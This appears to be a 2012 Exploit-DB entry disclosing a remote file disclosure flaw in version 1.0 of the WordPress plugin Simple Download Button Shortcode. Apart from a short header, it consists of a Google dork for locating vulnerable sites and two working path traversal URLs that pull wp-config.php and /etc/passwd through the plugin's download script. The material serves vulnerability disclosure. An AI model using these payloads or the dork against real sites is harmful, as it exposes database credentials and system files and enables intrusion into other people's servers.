WordPress Plugin Simple Download Button ShortCode 1.0 - Remote File Disclosure

EDB-ID:

19020

CVE:



Platform:

PHP

Published:

2012-06-08

##################################################
# Description : Wordpress Plugins - Simple Download Button Shortcode 
Remote File Disclosure Vulnerability
# Version : 1.0
# Link : 
http://wordpress.org/extend/plugins/simple-download-button-shortcode/
# Plugins : 
http://downloads.wordpress.org/plugin/simple-download-button-shortcode.1.0.0.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/simple-download-button-shortcode/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../../../../../etc/passwd